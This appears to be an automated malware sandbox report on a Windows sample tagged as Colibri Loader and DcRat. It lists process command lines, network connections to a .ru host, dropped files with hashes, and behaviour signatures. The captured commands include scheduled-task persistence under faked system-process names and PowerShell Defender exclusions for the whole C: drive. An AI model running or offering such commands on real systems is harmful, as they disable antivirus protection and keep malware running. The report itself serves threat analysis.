schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 8 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 13 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hs0sn2L6wi.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d3cdb8ee-0726-4212-b937-b3beddfec743.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fc57db3-e45e-4322-8a73-b1b80b2d87a8.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b2a2203-4a5d-4a4a-a926-4c350a596aa9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\71a54d09-d7d0-40f8-99cb-ef77c22aa4c9.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b3a74449-cbc7-4681-8a73-247704307d6d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e72ad55-b141-43db-aeae-473cf7b63099.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\53e2a958-5a4b-41d6-9f4e-c25d3c55600f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f6946b19-d9f7-43a1-b77e-0b6af9bf0db5.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e32edd9-6e70-4578-94ef-ee9f3be44825.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e66d39f-fbd5-4c52-970c-e552e9bc9e55.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e430e252-e5f5-45b6-a030-9a719da2b330.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95932655-c738-490b-b26f-ab1a6bf3f3b6.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32f9b173-8f76-464c-b3cc-53ebd4189533.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\621e4bb5-ea86-4af6-8bbd-359974861059.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86000b1e-ea65-4f43-973d-d5dfc0415136.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2c2f8a08-4d44-48a7-a649-7178c41ca286.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb541896-b775-4315-b5ff-f6ea9288c609.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b959eb7-5698-48e1-97bb-56085a85d3d4.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4e51c0d6-98e3-4963-877f-889aaa8eea97.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da0aa89d-aa3b-48b2-878c-80493f910f67.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e51f38fd-9ba6-4250-a4c8-2d9006856539.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28733509-40e2-4a82-8428-b0664447d8fd.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp

Files

memory/2360-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

memory/2360-1-0x0000000000040000-0x0000000000534000-memory.dmp

memory/2360-2-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/2360-3-0x000000001BA40000-0x000000001BB6E000-memory.dmp

memory/2360-4-0x0000000000790000-0x00000000007AC000-memory.dmp

memory/2360-5-0x00000000007B0000-0x00000000007B8000-memory.dmp

memory/2360-6-0x00000000007C0000-0x00000000007D0000-memory.dmp

memory/2360-7-0x00000000007F0000-0x0000000000806000-memory.dmp

memory/2360-8-0x00000000007D0000-0x00000000007E0000-memory.dmp

memory/2360-9-0x0000000000810000-0x000000000081A000-memory.dmp

memory/2360-10-0x0000000000820000-0x0000000000832000-memory.dmp

memory/2360-11-0x0000000000830000-0x000000000083A000-memory.dmp

memory/2360-12-0x00000000009C0000-0x00000000009CE000-memory.dmp

memory/2360-13-0x00000000009D0000-0x00000000009DE000-memory.dmp

memory/2360-14-0x00000000009E0000-0x00000000009E8000-memory.dmp

memory/2360-15-0x00000000009F0000-0x00000000009F8000-memory.dmp

memory/2360-16-0x0000000000A00000-0x0000000000A0C000-memory.dmp

C:\Windows\AppCompat\Programs\OSPPSVC.exe

MD5 6e7923159a06c48bb09a81080d2d8266
SHA1 a2126afd2d75f3dedb602fd7f63b9940e0b47c22
SHA256 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
SHA512 d2ddd13c739e92febab2685f393aeed15140c4b03d3c15ec49c86bac764ab6e3a01982a64118bd9d4e700161b85e1a7f3a91f904322ecc17d6253174a08f4365

C:\Users\Default\Videos\RCXEF56.tmp

MD5 2931e6e3e42233d9b7e650bce7435f36
SHA1 34eb80ddcf0438f5627e8b12be7a22a2de2b7a6e
SHA256 d8f391f6ab24765685b90a9815f3ff80dc3825f73dcaecf2aa25d786feb290bf
SHA512 6d3be094a7bc7809bf5bea9271b0dc3ca34ab6172cb33037bbc45385ae483f2a273f36de7aca68a045ace98a99450b1eba8f81686d4b01691375f595c057a692

memory/2360-128-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 628dc3ec330924cd33ec8371221dd65c
SHA1 5c3d88d4618a27908ecf80f98f2d8d473839a04b
SHA256 0dd56785cb0022cb5ab9b99ece4239297248d5065af6a5dece80f9698a619bd5
SHA512 a090664d56d09a181b4710fba9526f379638af0fa7a666ea07569f38e24a4ba5b0ed6b0f24c1b8f5b4768ec3c01c76d1c12c7b164ac77487eb3c2509ac6f0f5e

memory/2600-152-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2600-151-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/2360-172-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hs0sn2L6wi.bat

MD5 cf094da7c9fa2ca9ca0ce3eb3bc24905
SHA1 118e08c083158eb8d49a34ab57b732038d7f01ed
SHA256 1a3d5e594d2261b07866caa156976a854bff8f40b03212e37cca9dd4cd7a2991
SHA512 7d712718e53425602a8110181334e3355e674376b7040faf76d7767e15b14198aca906a25095b97798636563c37a1ea1f43cf76e5df72032a16fe28da75595fd

memory/2124-207-0x0000000000F00000-0x00000000013F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3fc57db3-e45e-4322-8a73-b1b80b2d87a8.vbs

MD5 d40872492033fdc6863a3f6ea94f5e9e
SHA1 4251f7287871540f6c6d2e5bba184c92ae0376e4
SHA256 701bebb58771b0617fcead66fda1c3a93c5b12ccf6fe694650f4a281ec64e7a3
SHA512 f6ed939134deb797da120fb43aed95efbd5b91e7dfd64eb92bdc951d9aa35d94c5b6f3ab52d66ad66096c3cd0651fe484838f028623ba8af16af8ac508bbfb67

C:\Users\Admin\AppData\Local\Temp\d3cdb8ee-0726-4212-b937-b3beddfec743.vbs

MD5 bd3f74c53f228f7bd3ed7b1f13b5f3eb
SHA1 e9a0a72fbecf1f0b99d10bf7792b1c870b49b084
SHA256 410f95bcd6471ed4b24c695dd58ab2c8495f9f96e2b2711dba958a52bda71236
SHA512 7d9d586d6ad705d9b1cdb99bd934cae5ec5836f1c0125dd748020cfc2bf5c6b67a856814b0baa162eb2d7592cd34761cf6bedeca453a62ec0e5d4fcdb8212c3b

C:\Users\Admin\AppData\Local\Temp\tmp26E2.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

C:\Users\Admin\AppData\Local\Temp\3b2a2203-4a5d-4a4a-a926-4c350a596aa9.vbs

MD5 cceaad656d19f25ac987f2b83b251f29
SHA1 86312088f14a84ef577ea94a63332a9265628c37
SHA256 5133b1e7c0df63d5991e82180a15afc9582e73ed3942ba269181b8b13d8326ac
SHA512 b893f4033b6978f7150c38c97194b37add52e5a14bc1808fe21d06f3466df74e193bb1a1371f0ecc2a357c1a3500accb79311f3d871e254a36b3e4a3c5cb4fb6

memory/2772-235-0x00000000008A0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b3a74449-cbc7-4681-8a73-247704307d6d.vbs

MD5 7904c55d5f164923e3fc85e32e8d2ec7
SHA1 9980c8880024f9b160a0b42ac9252338e7f46133
SHA256 5b87be83c9c8c599c8e30e4b3b5257e7a28af928afc0b2b1ecb15c7c4808c9f8
SHA512 8f72ce7b4f052243e53727f935440e5452985799597b56a8eed2ffebdf29e61528ea383d786d22bfde39bd92c60514c9decae4180cf291ec0342663d8af3048e

C:\Users\Admin\AppData\Local\Temp\53e2a958-5a4b-41d6-9f4e-c25d3c55600f.vbs

MD5 d12a0f0cfb4190390948d83562781d1e
SHA1 cc9294211b3c2c24b0bc76936819ccd6789c961a
SHA256 402fb2ea1ebcec0e2db2754df6e1c0dca341a97e6e4248f761b75441754e6bd7
SHA512 aa22250b61ebb3862c00b739f76b7b00980dce14af878a32a15c3698f0fe6bd62c9b93074eeff1cf2f4d7d68e6791911ea83cbea6ce0f3c4c3b97849e66bfcfc

memory/1944-264-0x0000000000F80000-0x0000000001474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2e32edd9-6e70-4578-94ef-ee9f3be44825.vbs

MD5 77cefa19386b86b69fce53e37b631056
SHA1 033e02c5eeec35dbcc2ddedb46f42355757330a1
SHA256 6bffcecdf5645012551787c385e302f5942c5e865e2a03e60d234e823c8f1d48
SHA512 cf8d4ee461649ee05cad98c7ccff3b1fd445dc0e9e025dd310d8daf92edcef4813b783b35882d65223e15c3db869c25f58e3d30a4152f7e4be46a3052d890e8c

C:\Users\Admin\AppData\Local\Temp\e430e252-e5f5-45b6-a030-9a719da2b330.vbs

MD5 d5c186139e74b1fe59ad6de13331b3ac
SHA1 16e7187a8c1a9118b4dd6e7639892c5071166c43
SHA256 2f7bf5349e18f8a64bb9a9d993816a40588b3a5d169208b8e4f2bb07c6e181b3
SHA512 1fbaec516d998094df33f25cc904f1fcf0498f74893e336e96fa4c0bb00685cb05319f465b7056538e962bd5b8567f531e775f886abb06ee5874c1cddc7d6fc6

memory/1136-293-0x00000000010F0000-0x00000000015E4000-memory.dmp

memory/1136-294-0x00000000007B0000-0x00000000007C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\32f9b173-8f76-464c-b3cc-53ebd4189533.vbs

MD5 9f11a492b0603d73bbfbb625c3b25c41
SHA1 8cbc0478fe7e49aeed547983229f9abb336fe7a6
SHA256 8be0e250de8c3b01afa6c8306d1159868cd186098baf7706d4915e681416c9bd
SHA512 a1b58fe60affafb7bf3e5e0311190360fca099177b00c12adf61daba6fa2d17e82c8986f1a86f7981f53503ffa707159d4ab082fb51011d3c9cb6e434a5d455a

C:\Users\Admin\AppData\Local\Temp\86000b1e-ea65-4f43-973d-d5dfc0415136.vbs

MD5 bf8c598bdb6755214177f00ff5fc8956
SHA1 13a185e2de9b453ecfd06bd997ef146207fc3402
SHA256 fc39641f8bebf6184ca5ab21657c7e83d4c0cbe0ce19d3e16e2439c0e619d30c
SHA512 5412bc193aa39d58bd08f919c6d7bcbd64d5267c58c2a52c54bd23025f645f6636f63abe4955c3f9d0698ec70f7c477a7047540f745343f1ff18edd88be4e376

C:\Users\Admin\AppData\Local\Temp\fb541896-b775-4315-b5ff-f6ea9288c609.vbs

MD5 dc4c43599351d067f4c44ccacddfdf6d
SHA1 61b2bea41fdba7b0ef9c4610ebe0f82d67329414
SHA256 d7b077ea5293f46a2cb9cf039c8f94902e5452d198758eaf26e47040fcdbdae4
SHA512 0538f85577c86038f2dcb54f1528dcc3a3b617551d2b1a24e07362ca166f6281c762b817b5473a61f28f8cbd90d25a2b14ef77b540fbc911701698e4121b9f8a

memory/1860-337-0x0000000000330000-0x0000000000824000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4e51c0d6-98e3-4963-877f-889aaa8eea97.vbs

MD5 7b6c3666ce9e445d1f15208ac4c514be
SHA1 71bb09182c207711a93e7652900a320d84d5b1c2
SHA256 b316248992ee5b92d1932279edb859dd986570ce1e8c9120435bcdb38d7c530a
SHA512 74ac0e4827e99fff5897fbb888d9dd677b8b0c9e307443f2f2df41038bf23e2922ff62930e03e1a2f129173cd172c173de21087c28da8e522143a155f9a982f9

memory/1780-352-0x0000000000C00000-0x00000000010F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e51f38fd-9ba6-4250-a4c8-2d9006856539.vbs

MD5 4020aae06740cb966b8baa521dad25ab
SHA1 a8e479e29ceebdd299995e9f9809089df76a5ac0
SHA256 b6e7e4e2b70a6355246853272fb38d93471d61a76cc6c9db46ab178c119d4a50
SHA512 e3eaeb42bce372a93268615ed02c1ea322e2f4172719105cb33035810dccf5f865e8c9ff85a702f5b2f31c09b83f41b92ffc7570484c3b7b0ee6e4d0fd66ff4e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 04:57

Reported

2024-11-17 04:59

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

Signatures

Colibri Loader

loader colibri

Colibri family

colibri

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
